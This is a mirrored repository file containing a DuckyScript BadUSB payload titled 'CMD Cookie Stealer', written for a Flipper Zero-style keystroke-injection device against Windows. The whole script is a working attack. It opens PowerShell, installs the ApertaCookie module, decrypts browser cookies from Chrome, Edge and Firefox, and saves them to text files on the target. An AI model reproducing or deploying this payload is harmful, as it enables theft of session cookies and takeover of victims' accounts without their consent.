mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-22 14:30:21 +00:00
38 lines
949 B
Plaintext
38 lines
949 B
Plaintext
REM Title: CMD Cookie Stealer
|
|
REM Author: 7h30th3r0n3
|
|
REM Target: Windows 7/8/10/11
|
|
REM Version: 1.0
|
|
REM Category: Grabber
|
|
REM Create 3 files with cookies stolen from browsers with ApertaCookie
|
|
GUI r
|
|
delay 100
|
|
STRING powershell
|
|
ENTER
|
|
delay 300
|
|
STRING Install-Module -Name "ApertaCookie" -Scope CurrentUser -Force
|
|
ENTER
|
|
delay 200
|
|
STRING Import-Module -Name "ApertaCookie"
|
|
ENTER
|
|
delay 200
|
|
STRING $allChromeCookie = Get-RawCookiesFromDB -Browser Chrome
|
|
ENTER
|
|
delay 200
|
|
STRING $session = Get-DecryptedCookiesInfo -Browser Edge
|
|
ENTER
|
|
delay 200
|
|
STRING $session2 = Get-DecryptedCookiesInfo -Browser Chrome
|
|
ENTER
|
|
DELAY 200
|
|
STRING $session3 = Get-DecryptedCookiesInfo -Browser Firefox
|
|
ENTER
|
|
delay 200
|
|
STRING Add-Content -Path cookie-edge.txt -Value $session
|
|
ENTER
|
|
STRING Add-Content -Path cookie-chrome.txt -Value $session2
|
|
ENTER
|
|
STRING Add-Content -Path cookie-firefox.txt -Value $session3
|
|
ENTER
|
|
STRING exit
|
|
ENTER
|